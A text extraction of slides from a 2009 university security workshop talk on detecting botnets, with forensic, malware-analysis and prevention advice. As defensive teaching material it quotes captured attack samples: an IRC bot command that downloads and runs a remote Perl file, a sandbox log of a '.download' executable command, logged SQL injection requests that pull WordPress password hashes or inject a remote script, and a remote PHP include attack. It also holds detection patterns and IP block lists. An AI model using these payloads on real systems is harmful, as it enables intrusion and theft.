Transcript detect

Botnet Phd (Piled Higher and Deeper)
A Presentation About
Botnet Detection
For
NWACC 09
Security Workshop
by
Craig A Schiller, CISSP-ISSMP,ISSAP
Chief Information Security Officer
Portland State University
Agenda
Introduction
Detection
Forensics/Intel Gathering
Malware Analysis
Incident Response
Prevention
© 2009 Craig A Schiller
2
Primary Source
© 2009 Craig A Schiller
3
© 2009 Craig A Schiller
4
Agenda
Introduction
Detection
Forensics/Intel Gathering
Malware Analysis
Incident Response
Prevention
© 2009 Craig A Schiller
5
How Do We Detect Them?
Computer is
Exploited
Becomes a Bot
Other Bot Clients
User Browsing Malicious Sites
New Bot Rallys to
let Botherder
know it’s joined
the team
C&C
A/V Detection
Retrieve the Anti
A/V module
Download server
Secure the New
Bot Client
Listen to the C&C
Server/Peer for
commands
C&C
C&C
Report Result to
the C&C Channel
Retrieve the
Payload module
Download server
Execute the
commands
Possible traffic to victim
On Command,
Erase all evidence
and abandon the
client
© 2009 Craig A Schiller
6
How Do We Detect Them?
Computer is
Exploited
Becomes a Bot
Other Bot Clients
Security & FW
logs
C&C
User Browsing Malicious Sites
New Bot Rallys to
let Botherder
know it’s joined
the team
A/V Detection
Retrieve the Anti
A/V module
Download server
Secure the New
Bot Client
C&C
Known Malware
Distribution sites
Listen to the C&C
Server/Peer for
commands
Known C&C sites
User Complaint
C&C
Report Result to
the C&C Channel
Botlike Traffic
Retrieve the
Payload module
Download server
Bad Behavior
Abuse@ notices
Execute the
commands
Talking to Darknet
Possible traffic to victim
On Command,
Erase all evidence
and abandon the
client
Anomalous Protocol Detection
© 2009 Craig A Schiller
7
How Do We Detect Them?
A/V, Anti-Spam, Anti-Spyware
I checkedHost
andbased
I didn’t see anything
Enterprise Reporting
User Help Desk Tickets
Abuse notifications
Quasi-Intelligence Organizations
Monitoring & Analysis
Ourmon
Firewall & Router logs
IDS/IPS – Host and Network
DNS
Server & Workstation Log analysis
Malware analysis
Forensics © 2009 Craig A Schiller
8
Ourmon
Free network security monitoring tool, with
Botnet detection capabilities
http://ourmon.cat.pdx.edu/ourmon/index.html
© 2009 Craig A Schiller
9
Network Anomaly Detection
Is it scanning?
 Is it participating in an IRC channel?
 Is there a high controls to data ratio?
 Is the IRC server/port listed as a
known Command & Control server?
 Does the IRC traffic text look botlike?
 Did the host lookup or attempt to
communicate with a known C&C
server?
 Did the host attempt to communicate
with an IP address in the Darknet?

© 2009 Craig A Schiller
10
Network Anomaly Detection

TCP workweight = syns sent + fins
sent + resets returned/total TCP
packets
ww = Syn+Fin+Reset
Total TCP
measure of signal/noise (control/data)
 high number means all control (syn
scanner)
 basically means: an IP is scanning

© 2009 Craig A Schiller
11
Network Anomaly Detection
Ourmon does a similar calculation with
IRC traffic
measure of signal/noise (control/data)
 high number means non-human
communication
 basically means: a bot or an
application (game)

© 2009 Craig A Schiller
12
Recent large ddos attack
fundamental pkts graph looks like this normally:
© 2009 Craig A Schiller
13
Ouch, ouch, ouch!
that’s 869k pps – we have physical gE connection to Inet …
© 2009 Craig A Schiller
14
“Botlike” IRC text
IRC text: IRCMSG: PRIVMSG: s=192.168.67.170 -> d=10.252.0.41
dport=65253 sflag=1, channel=priv8 clen=5: p=[:[email protected]
PRIVMSG #priv8 :fmj curl -o mdbn.gif http://www.warriorbride.ca/mdbn.gif;perl
mdbn.gif;rm -f *.gif*]
© 2009 Craig A Schiller
15
“Normal” IRC text
IRC text: IRCMSG: PRIVMSG: s=192.168.67.170 -> d=10.252.0.41
dport=65253 sflag=1, channel=priv8 clen=5: p=[:[email protected]
PRIVMSG #priv8 : OMG, you’re just my BFF Jill! I once had a BFF that was
nowhere as good a BFF as you. <and other meaningless babble> ]
© 2009 Craig A Schiller
16
Snort signatures
No general purpose intrusion detection.
Limited set of Bot related signatures
© 2009 Craig A Schiller
17
Incident Detection examples
1. today, Mcafee, 131.252.242.243, pri=hi, JS/Wonka [**] [1:3111116:1] Mcafee
http feed: :http://bluebookcarpices.com/ <http://pices.com/> (JS/Wonka) [**]
[Classification: access to a potentially vulnerable web application] [Priority: 2]
05/21-08:13:56.950979 131.252.242.243:52733 -> 216.240.128.250:80 TCP
TTL:63 TOS:0x0 ID:38398 IpLen:20 DgmLen:568 DF
***AP*** Seq: 0xD222814A Ack: 0x278524DD Win: 0xFFFF TcpLen: 32 TCP
Options (3) => NOP NOP TS: 345145726 2079777105
2. today, zlob, 131.252.243.80, pri=hi
[**] [1:666666:1] zlob dns request [**]
[Classification: Potentially Bad Traffic] [Priority: 2]
05/21-09:50:22.532193 131.252.243.80:49190 -> 85.255.115.29:53 UDP
TTL:63 TOS:0x0 ID:3755 IpLen:20 DgmLen:73
Len: 45
© 2009 Craig A Schiller
18
Quasi-Intelligence Organizations
REN-ISAC
Shadowserver
Nanog
APWG
Mailing lists
• Botnet
•
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
• Phishing
•
http://www.whitestar.linuxbox.org/mailman/listinfo/phishing
• Vendor
ISC Storm Center
http://www.emergingthreats.net/
http://www.malwaredomainlist.com
© 2009 Craig A Schiller
19
Quasi-Intelligence Organizations
© 2009 Craig A Schiller
20
Lists of Known C&C servers
Shadow Server Sample
IP Address
Port
Channel
Country
Region
State
Domain
ASN
AS Name
AS Description
81.211.7.122
69.18.206.194
3267
#B#t[r2]N#t
RU
US
MOSCOW |
COMMACK
MOSKVA
NEW YORK
GLDN.NET
INVISION.COM
3216
12251
SOVAM
INVISION
AS Golden Telecom, Moscow, Russia
Invision.com, Inc.
81.211.7.122
69.18.206.194
3267
#B#tN#t[r3]
RU
US
MOSCOW |
COMMACK
MOSKVA
NEW YORK
GLDN.NET
INVISION.COM
3216
12251
SOVAM
INVISION
AS Golden Telecom, Moscow, Russia
Invision.com, Inc.
81.211.7.122
69.18.206.194
3267
#B&#65533;t[r2]N&#65533;t
RU
US
MOSCOW |
COMMACK
MOSKVA
NEW YORK
GLDN.NET
INVISION.COM
3216
12251
SOVAM
INVISION
AS Golden Telecom, Moscow, Russia
|Invision.com, Inc.
81.211.7.122
69.18.206.194
3267
#B.tN.t[r3]
RU
US
MOSCOW |
COMMACK
MOSKVA
NEW YORK
GLDN.NET
INVISION.COM
3216
12251
SOVAM
INVISION
AS Golden Telecom, Moscow, Russia
|Invision.com, Inc.
213.234.193.74
85.21.82.55
6667
#secured
RU
RU
MOSCOW |
MOSCOW
MOSKVA
MOSKVA
NET.RU -
39442
8402
UNICO
CORBINA
AS JSC UNICO
AS Corbina Telecom
http://www.shadowserver.org/wiki/pmwiki.php/Involve/GetReportsOnYourNetwork#toc1
http://www.shadowserver.org/wiki/pmwiki.php/Services/Botnet-CCIP
© 2009 Craig A Schiller
21
Quasi-Intelligence Organizations
REN-ISAC
Supported by Indiana University and through relationship with EDUCAUSE and
Internet2, the REN-ISAC is an integral part of higher education’s strategy to improve
network security through information collection, analysis and dissemination, early
warning, and response -- specifically designed to support the unique environment
and needs of organizations connected to served higher education and research
networks; and supports efforts to protect the national cyber infrastructure by
participating in the formal U.S. ISAC structure.
The REN-ISAC receives, analyzes and acts on operational, threat, warning and
actual attack information derived from network instrumentation and information
sharing relationships. Instrumentation data include netflow, router ACL counters,
darknet monitoring, and Global Network Operations Center operational monitoring
systems. Information sharing relationships are established with other ISACs,
DHS/US-CERT, private network security collaborations, network and security
engineers on national R&E network backbones, and the REN-ISAC members.
© 2009 Craig A Schiller
22
Spamhaus Drop List
The Spamhaus Don't Route Or Peer List
DROP (Don't Route Or Peer) is an advisory "drop all traffic" list, consisting of stolen 'zombie' netblocks and
netblocks controlled entirely by professional spammers. DROP is a tiny sub-set of the SBL designed for use
by firewalls and routing equipment.
DROP is currently available as a simple text list, but will also be available shortly as BGP with routes of
listed IPs announced via an AS# allowing networks to then null those routes as being IPs that they do not
wish to route traffic for.
The DROP list will NEVER include any IP space "owned" by any legitimate network and reassigned - even
if reassigned to the "spammers from hell". It will ONLY include IP space totally controlled by spammers or
100% spam hosting operations. These are "direct allocations" from ARIN, RIPE, APNIC, LACNIC, and
others to known spammers, and the troubling run of "hijacked zombie" IP blocks that have been snatched
away from their original owners (which in most cases are long dead corporations) and are now controlled
by spammers or netblock thieves who resell the space to spammers.
When implemented at a network or ISP's 'core routers', DROP will protect all the network's users from
spamming, scanning, harvesting and dDoS attacks originating on rogue netblocks.
Spamhaus strongly encourages the use of DROP by tier-1s and backbones. See the DROP FAQ for
information on use and implementation.
© 2009 Craig A Schiller
23
Spamhaus Drop List excerpt 9/17/09
85.255.112.0/20
SBL36702
UkrTeleGroup
194.146.204.0/22
SBL51152
Nevacon
110.44.0.0/20
SBL74731
Sonic Colo-HK
116.199.128.0/19
SBL56563
Beijing HuaXingGuangWang
117.103.40.0/21
SBL75246
InfoVision Data Hosting Service
119.27.128.0/19
SBL75245
InfoVision Data Hosting Service
119.42.144.0/21
SBL70035
InfoMove Limited HK
120.143.128.0/21
SBL67396
121.46.64.0/18
SBL72673
128.199.0.0/16
SBL62478
132.232.0.0/16
SBL9176
132.240.0.0/16
SBL68517
134.33.0.0/16
SBL7097
138.252.0.0/16
SBL9702
138.43.0.0/16
SBL69354
139.167.0.0/16
SBL64740
143.49.0.0/16
SBL7182
150.230.0.0/16
SBL78129
152.147.0.0/16
SBL8847
167.28.0.0/16
SBL75680
167.97.0.0/16
SBL12947
168.151.0.0/16
SBL73292
InfoVision Data Hosting Service
© 2009 Craig A Schiller
24
Malware Domain List
© 2009 Craig A Schiller
25
DNS for Botnet Detection
I checked and I didn’t see anything
© 2009 Craig A Schiller
26
DNS for Botnet Detection
I checked and I didn’t see anything
DB of all lookups for
Known C&C
Known Malicious SW
Distros
http://www.enyo.de/fw/software/dnslogger/
http://www.enyo.de/fw/software/dnslogger/whois.html
© 2009 Craig A Schiller
27
knujon
10 Most Offensive Registrars
XIN NET (Second Time at #1)
eNom
Network Solutions
Register.com
PLANETONLINE
RegTime
OnlineNIC
SpotDomains (domainsite)
Wild West
HICHINA Web Solutions
© 2009 Craig A Schiller
28
Search Engine Spam & Clicks 4 Hire
Use Google to search for Clicks-4-Hire relays and search engine spam
site:yoursite.com -pdf -ppt -doc phentermine OR viagra OR cialis OR vioxx OR oxycontin OR levitra OR ambien
OR xanax OR paxil OR "slot-machine" OR "texas-holdem"
© 2009 Craig A Schiller
29
Google site search results
© 2009 Craig A Schiller
30
An owned webpage
© 2009 Craig A Schiller
31
Browser Intelligence gathering
© 2009 Craig A Schiller
32
Links to this web page
© 2009 Craig A Schiller
33
Man in the Browser Attack - torpig
© 2009 Craig A Schiller
34
Agenda
Introduction
Detection
Forensics/Intel Gathering
Malware Analysis
Incident Response
Prevention
© 2009 Craig A Schiller
35
Forensics/Intel Gathering
•
Quick Forensics
• Log Analysis
• Process Explorer
• TCPView
• AutoRuns
• Process Monitor
•
Rpier – First Responder Tool
• Automated Forensics
• Consistent information gathered regardless of who runs it
• Sleuthing
• How did they get in?
• What does it do?
• What files are used?
• When did what happen?
• Malware Analysis
•
More Sleuthing
© 2009 Craig A Schiller
36
Log analysis
I checked and I didn’t see anything
© 2009 Craig A Schiller
37
Forensics/Intel Gathering example
Process
PID
CPU
Description
Company Name
System Idle Process 0
93.36
Interrupts
n/a
1.56
Hardware Interrupts
DPCs
n/a
Deferred Procedure Calls
System
4
0.39
smss.exe
508
Windows NT Session Manager
Microsoft Corporation
csrss.exe
620
Client Server Runtime Process Microsoft Corporation
winlogon.exe
884
Windows NT Logon Application Microsoft Corporation
services.exe
944
Services and Controller app
Microsoft Corporation
svchost.exe
1180
Generic Host Process for Win32 Services Microsoft
Corporation
wmiprvse.exe 3400
WMI
Microsoft Corporation
svchost.exe
1252
Generic Host Process for Win32 Services Microsoft
Corporation
svchost.exe
1312
Generic Host Process for PSXSS.EXE
896
Interix Subsystem Server
Microsoft Corporation
init
2156
Interix Utility
Microsoft Corporation
inetd
2432
Interix Utility
Microsoft Corporation
iexplorer.exe
3560
explorer.exe
8564
Windows Explorer
Microsoft Corporation
ccApp.exe
9208
Symantec User Session
Symantec Corporation
VPTray.exe
8636
Symantec AntiVirus Symantec Corporation
VPC32.exe
9524
Symantec AntiVirus Symantec Corporation
iexplorer.exe
6712
sqlmangr.exe
9904
SQL Server Service Manager
Microsoft Corporation
© 2009 Craig A Schiller
38
Forensics/Intel Gathering example
© 2009 Craig A Schiller
39
Forensics/Intel Gathering example
© 2009 Craig A Schiller
40
Forensics/Intel Gathering example
Strings in the file iexplorer.exe
Strings in memory
© 2009 Craig A Schiller
41
Centralized Logging
Internet
L
Log o
Collection
g
C
o
NTSyslog
l
l
e
c
t
i
o
n
Server
`
Analysis
`
MySQL
DataBase
`
© 2009 Craig A Schiller
`
42
Workstation Log Analysis
Log Parser
http://www.microsoft.com/downloads/details.aspx?FamilyID=890cd06b-abf8-4c25-91b2-f8d975cf8c07&displaylang=en
© 2009 Craig A Schiller
43
A/V Centralized Reporting
Use (examine) the central reporting feature of your antivirus server.
Blocked by port blocking rule
3/25/2008
12:56:26 PM
C:\Program Files\DNA\btdna.exe
Prevent IRC communication
202.57.184.145:6666
3/25/2008
6:26:40 PM
C:\Program Files\DNA\btdna.exe
Prevent IRC communication
83.252.58.149:6666
3/25/2008
8:55:30 PM
C:\Program Files\DNA\btdna.exe
Prevent IRC communication
85.21.246.228:6666
3/25/2008
11:24:38 PM
C:\Program Files\DNA\btdna.exe
Prevent IRC communication
80.222.68.139:6667
3/26/2008
3:37:41 AM
C:\Program Files\DNA\btdna.exe
Prevent IRC communication
85.21.246.228:6666
3/26/2008
5:07:33 AM
C:\Program Files\DNA\btdna.exe
Prevent IRC communication
85.21.246.228:6666
3/26/2008
7:23:09 AM
C:\Program Files\DNA\btdna.exe
Prevent IRC communication
80.222.68.139:6667
3/26/2008
7:38:59 AM
C:\Program Files\DNA\btdna.exe
Prevent IRC communication
85.21.246.228:6666
3/26/2008
7:54:09 AM
C:\Program Files\DNA\btdna.exe
Prevent IRC communication
80.222.68.139:6667
3/26/2008
10:40:04 AM
C:\Program Files\DNA\btdna.exe
Prevent IRC communication
85.21.246.228:6666
3/26/2008
10:54:53 AM
C:\Program Files\DNA\btdna.exe
Prevent mass mailing worms from sending mail
41.220.121.130:25
© 2009 Craig A Schiller
44
A/V Centralized Reporting
5/9/2008 4:53:34 PM Would be blocked by Access Protection rule (rule is currently not enforced)
PSU\anyman C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\anyman\Local Settings\Temporary Internet Files\Content.IE5\BDX492TE\
MediaTubeCodec_ver1.556.0[1].exe
Common Standard Protection:
Prevent common programs from running files from the Temp folder
Action blocked : Execute
MediaTubeCodec is a fake codec that installs malware and tells you that your
computer is infected so you will download a fake antivirus product.
This appeared in the logs before McAfee could detect this malware
© 2009 Craig A Schiller
45
A/V Centralized Reporting
What does quarantine or “No Action Taken” mean?
User defined detection: SPYWARE (Potentially Unwanted Program)
5/12/2008
9:01:50 AM
No Action Taken (Delete failed)
SYSTEM
McShield.exe
C:\Documents and Settings\anyman\Desktop\ctfmona.exe
5/12/2008
9:02:31 AM
User defined detection : No Action Taken
(Clean failed because the detection isn't cleanable)
SYSTEM McShield.exe
C:\Documents and Settings\anyman\Desktop\ctfmona.exe
© 2009 Craig A Schiller
46
Detectable Behavior
• Multi-homed DNS
– FQDN maps to 3 or more IP addresses
botnet1.example.com pointing to 127.0.0.1
botnet1.example.com pointing to 127.0.0.2
botnet1.example.com pointing to 127.0.0.3
botnet1.example.com pointing to 127.0.0.4
botnet1.example.com pointing to 127.0.0.5
botnet1.example.com pointing to 127.0.0.6
• Dynamic DNS used thru commercial site
– Change IP addresses quickly
• Short DNS TTLs for clients
– Remap DNS often, check at boot
• FastFlux DNS
– Change IP addresses and/or DNS names quickly (for
spam < 5 minutes) and often
© 2009 Craig A Schiller
47
Hiding the C&C Server or Phishing Website
The above animation demonstrates a persistent phishing cluster detected and analyzed by InternetPerils using server addresses from 20 dumps of the APWG repository, the
earliest shown 17 May and the latest 20 September. This phishing cluster continues to persist after the dates depicted, and InternetPerils continues to track it.
© 2009 Craig A Schiller
48
Passive DNS
http://cert.uni-stuttgart.de/stats/dns-replication.php?query=differbe.hk&submit=Query
https://dnsparse.insec.auckland.ac.nz/dns/index.html
© 2009 Craig A Schiller
49
Fast Flux DNS example
© 2009 Craig A Schiller
50
Internal Intelligence gathering
Rapier
A First Responder Toolkit
Developed by Steve Mancini, Intel
http://code.google.com/p/rapier/
© 2009 Craig A Schiller
51
Rapier
© 2009 Craig A Schiller
52
Malware Hash Registry
Cymru is happy to announce the availability of various service
options dedicated to mapping suspected malware hashes to
our insight about positively identified malware. Now you can
check if a particular piece of code is malware by querying
against the extensive Team Cymru Malware Hash Registry.
Using whois
Unix Time -seconds
$ whois -h hash.cymru.com
since midnight 1970-01-01
e1112134b6dcc8bed54e0e34d8ac272795e73d74
% A/V Package
Detection Rate
RESPONSE
e1112134b6dcc8bed54e0e34d8ac272795e73d74 1221154281 53
Using DNS (dig)
$ dig +short 733a48a9cb49651d72fe824ca91e8d00.malware.hash.cymru.com TXT
RESPONSE
"1221154281 53"
http://www.team-cymru.org/Services/MHR/
© 2009 Craig A Schiller
53
Alternate C&C Methods
Botnets
I Echo-Based
checked
and
I didn’t
see
anything
Echo-based means
the bot
would simply
announce
its existence to the C&C.
There are several ways of doing this with different volumes of data relayed.
•Connect & forget
•File data
•URL data
Command-Based Botnets
• Web GUI based
•Push rather than pull
•P2P
•IM
•Social Networking (My Space profiles)
•Remote Administration Tools
•Dameware
•CarbonCopy
•Terminal Services
•PC Anywhere
•RDP
•Drop zone – ftp is the leading protocol here
© 2009
Craig A
Schiller
•ftp – phishing C&C - regularly
reports
back
(echoes) to an FTP C&C,
54
Incident Response
Required by OUS Information Security
policy
PSU Information Security policy requires
an Incident Response plan
PSU has several means of discovering
incidents
© 2009 Craig A Schiller
55
Agenda
Introduction
Detection
Forensics/Intel Gathering
Malware Analysis
Incident Response
Prevention
© 2009 Craig A Schiller
56
Carsten Willem’s CWSandbox
Ubuntu
VMWare
XP Pro
© 2009 Craig A Schiller
57
Malware analysis
CWSandbox
- <scanner
name="AntiVir
I checked
andWorkstation"
I didn’tapplication_version="2.1.9-20"
see anything
signature_file_version="6.37.0.90">
<classification>WORM/Rbot.219136.17</classification>
<additional_info />
</scanner>
- <connections_outgoing>
- <connection transportprotocol="TCP" remoteaddr=“192.168.209.5"
remoteport="13601" protocol="IRC" connectionestablished="1" socket="448">
- <irc_data username="|00||-X-||4245" password="bong" nick="|00||-X-||4245">
<channel name="#sym" topic_deleted=":.download
http://wooop.mooo.com/buz/120.exe c:\120.exe 1" />
<privmsg_deleted value=":|00||-X||[email protected] PRIVMSG #sym
:_CHAR(0x03)_9-_CHAR(0x03)_1::_CHAR(0x03)_0[_CHAR(0x03)_12
120|MoD_CHAR(0x03)_0 ]_CHAR(0x03)_1::_CHAR(0x03)_9-_CHAR(0x03)_
Downloaded 324.0 KB to c:\120.exe @ 6.9 KB/sec." />
</irc_data>
</connection>
© 2009 Craig A Schiller
58
Analyzing the Malware
CWSandbox Analysis
© 2009 Craig A Schiller
59
The Future
Honeypots
© 2009 Craig A Schiller
60
Agenda
Introduction
Detection
Forensics/Intel Gathering
Malware Analysis
Incident Response
Prevention
© 2009 Craig A Schiller
61
Responding to Detection
© 2009 Craig A Schiller
62
Agenda
Introduction
Detection
Forensics/Intel Gathering
Malware Analysis
Incident Response
Prevention
© 2009 Craig A Schiller
63
Blocking Organized Crime supporters
If your ISP doesn't already block them, you can add known criminals to your
firewall rules or to your DNS dump tables.
Use the Spamhaus Drop list to block known evil sites
Intercage, Inhoster, and Nevacon:
85.255.112.0/20 #SBL36702
(85.255.112.0 - 85.255.127.255)
69.50.160.0/19
(69.50.160.0 - 69.50.191.255)
194.146.204.0/22 #SBL51152
(194.146.204.0 - 194.146.207.255)
Blog that track the RBN activities
http://rbnexploit.blogspot.com/
© 2009 Craig A Schiller
64
How do they get into User systems?
Guessing weak passwords/phishing attacks
Exploiting Network vulnerabilities
Using Social Engineering
Using web-based Trojans
Trojan websites – Game cheats
Trojan websites - Pornography
Using Email-based Trojans
Phishing & Pharming
Trojan downloads
Using IM-based Trojans (Social engineering)
Rogue dhcp server serving malicious DNS server
©
© 2009
2008 Craig
CraigAASchiller
Schiller
65
How do they get into Servers? php includes
<?php include($vuln); ?>
1. Get /a.php?vuln=http://webhost.com/evil.php
4. The Output from evil.php is sent to Attacker
Target.com
Attacker
3. Malware PHP file ‘evil.php’ is sent to Target.com
And is executed by the include() function.
2. Target makes request to wehost.com/evil.php
Webhost.com
©
© 2009
2008 Craig
CraigAASchiller
Schiller
66
How do they get into Servers? – SQL Injection
--c295b75d-A-[03/Jun/2008:02:52:08 --0700] ELS-dIP8ehcAACTQmlkAAAAJ 87.118.124.3
45819 192.168.22.155 80
--c295b75d-B-GET
/shesheet/wordpress/index.php?cat=999+UNION+SELECT+null,CONCAT(66
6,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_u
sers+where+id=1/* HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)
Host: www.somwhere-in.pdx.edu
Connection: close
--c295b75d-H--
©
© 2009
2008 Craig
CraigAASchiller
Schiller
67
mod-sec
Message: Warning. Pattern match
"(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b(?:(?:length|count|top)\\b.{1,100}?\\bfrom|fr
om\\b.{1,100}?\\bwhere)|.*?\\b(?:d(?:ump\\b.*\\bfrom|ata_type)|(?:to_(?:numbe|
cha)|inst)r))|p_(?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql
)?|makewebt ..." at ARGS:cat. [id "950001"] [msg "SQL Injection Attack.
Matched signature <union select>"] [severity "CRITICAL"]
Stopwatch: 1212486727810932 339469 (2354 3333 -)
Producer: ModSecurity v2.1.5 (Apache 2.x)
Server: Apache/2.2.8 (OpenPKG/CURRENT)
--c295b75d-Z--
©
© 2009
2008 Craig
CraigAASchiller
Schiller
68
Obfu73ca74ion
page=1%20un%69%6fn%20sel%65%63t%201%2c2%2c3%2c4%2c0x3c736372697
074207372633d22687474703a2f2f73696d706c652d7464732e696e666f2f5f39
2e6a73223e3c2f7363726970743e%2c6%2F%2A
-1 union select 1,2,3,4,<script src="http://simple-tds.info/_9.js"></script>,6/*
©
© 2009
2008 Craig
CraigAASchiller
Schiller
69
Pictures
phpBB photo galleries that permit users to post their own pictures
1. Evil user post a executable file with a .gif extension (notapic.gif)
2. Evil user browses to the executable gif
Webhost.com
Attacker
3. Webhost executes notapic.gif as web page owner
©
© 2009
2008 Craig
CraigAASchiller
Schiller
70
Other means
Profiles of user accounts (Social Networking sites)
Comment sections that don’t require the user to authenticate
BB’s that permit users to create their own accounts without an administrator
User web pages
Departmental web pages
Traditional network vulnerability attacks
©
© 2009
2008 Craig
CraigAASchiller
Schiller
71
Protect Your Enterprise
AVOIDANCE
1. Establish a perimeter and segregate valuable or dangerous network segments. Make
FW rules accountable and require change control
PREVENT
1. Ensure that all enterprise and local accounts have strong passwords. Configure
Domain security policy to enforce this and auto-lockout
2. Eliminate all generic accounts. Where possible make all non-user accounts services.
3. Eliminate or encapsulate all unencrypted authentication
4. Establish standards for web app and other development to eliminate avoidable coding
vulnerabilities (e.g. use of mod-sec for apache websites)
5. Staff your anti-spam, anti-virus, abuse, proxy cache, and web filter processing efforts
6. Block outbound port 25 traffic except from your official mail servers
7. Block outbound DNS requests except for iterative requests made through the official
DNS servers (prevents spray and pray attacks)
© 2009 Craig A Schiller
72
Protect Your Enterprise
DETECT
1. Install and operate IDS/IPS systems (snort, etc)
2. Analyze network traffic for heuristic evidence of botlike behavior
3. Google your own site - site:mysite.com viagra
site:mysite.com c99
4. Centralize and process logs, including workstation security and firewall logs.
5. Mine your anti-virus quarantines, abuse notifications, infected systems for intelligence
about botnet infections. Feed this information to your event correlation system
6. Participate or join quasi-intelligence organizations
MITIGATE
1. Use intelligence data in your DNS server to block access to C&C sites and malware
distribution sites.
2. Use your centralized logs to detect and react to password guessing schemes in nearrealtime.
3. Report detections to an incident reponse team that will quarantine compromised
systems, determine physical location, and direct IT staff to retrieve the system, extract
first responder data and intelligence, re-image the system than return it to the system
owner along with a report on the successful attack vector.
4. Include known malware distribution sites in your proxy server block lists
5. Establish a spearphishing hotline for quick response.
© 2009 Craig A Schiller
73
Protect Your Enterprise
REDUCE THE THREAT
1.
Report new threats. Phishing attacks to Anti-Phishing Working Group. Botnet
clients/C&C to isotf.org.
2. Feed the Bot related DNS attempts to your event correlation system
3. Add SiteAdvisor or IE7 anti-phishing feature to browsers
REDUCE THE VULNERABILITY
1. Actively scan your site for vulnerabilities (OS, network, web apps, etc)
NON-REALTIME ANALYSIS, DETECTION, and RECOVERY
1. Analyze data collected to identify new intelligence markers.
2. Evaluate new signatures, new tools, etc.
3. Use non-realtime data to develop strategies for ranking confidence related to
available data and intelligence.
4. Use Forensic techniques and sandbox technology to gather intelligence from known
compromised workstations.
© 2009 Craig A Schiller
74
RBN
© 2009 Craig A Schiller
75
RBN Operations
SILVERNET
CREDOLINK
RBN
OINVEST
SPB IX
DELTASYS
INFOBOX
DATAPOINT
11/21/07 Ref: Bizeul.org ©
© 2009
2008 Craig
CraigAASchiller
Schiller
76
RBN USA Dead?
It is pleasing to report the last remaining peer routing Atrivo
(AS 27595 Atrivo/ Intercage), ‘Pacific Internet Exchange’ (PIE)
see Spamhaus ref below, was withdrawn at 2:35am EST
Sunday Sept 21st 2008.
©
© 2009
2008 Craig
CraigAASchiller
Schiller
77
RBN USA Dead?
©
© 2009
2008 Craig
CraigAASchiller
Schiller
78
What Happened?
Company after company dropped relations with InterCage in the wake of multiple
reports documenting its shady dealings,
Suddenly UnitedLayer was the last firm willing to work with it. That essentially gave
Donaldson's people the power to send InterCage dark or, as he chose to do, stick
InterCage in a sandbox.
By Angela Gunn, BetaNews
September 25, 2008, 10:40 PM
http://www.betanews.com/article/UnitedLayer_COO_Giving_access
_to_InterCage_is_an_issue_of_ethics/1222396858
©
© 2009
2008 Craig
CraigAASchiller
Schiller
79
McColo
It is pleasing to report the last remaining peer routing Atrivo
(AS 27595 Atrivo/ Intercage), ‘Pacific Internet Exchange’ (PIE)
see Spamhaus ref below, was withdrawn at 2:35am EST
Sunday Sept 21st 2008.
©
© 2009
2008 Craig
CraigAASchiller
Schiller
80
Effect of De-peering
50% Drop in Spam
©
© 2009
2008 Craig
CraigAASchiller
Schiller
81
Who’s Next?
In the wake of the demise of Atrivo/Intercage and McColo, attention has focused
on other badware nets these entities formerly hosted.
EstDomains,
Esthost,
Hostfresh,
Cernel,
EstDomains was an Estonian network, led by Vladimir Tsastsin, that allegedly
once acted as the IP registrar for RBN domains. Malicious Web site hosting
nasties like CoolWebSearch and other spyware programs trace back to
EstDomains. Tsastsin has links to organized crime and also heads up Rove
Digital, a site also suspected of hosting malware servers.
Anti-spam group Spamhaus called EstDomain, Esthost, Cernel, and Hostfresh,
the "tentacles" of Atrivo/Intercage. Spamhaus cited these networks in August
2008 as backed by "gangs of cybercriminals" whose disappearance from the
Web would be difficult to achieve, but would result in a safer Internet.
©
© 2009
2008 Craig
CraigAASchiller
Schiller
82
Agenda
•
•
•
•
•
Botnet Overview
Botnet Schemes
How Do They Get In?
What Can We Do?
Concluding Thoughts
© 2009 Craig A Schiller
83
Source of all evil
©
© 2009
2008 Craig
CraigAASchiller
Schiller
84
Q&A
Questions?
Craig A Schiller, CISSP-ISSMP, ISSAP
[email protected]
Portland State University
CISO
© 2009 Craig A Schiller
85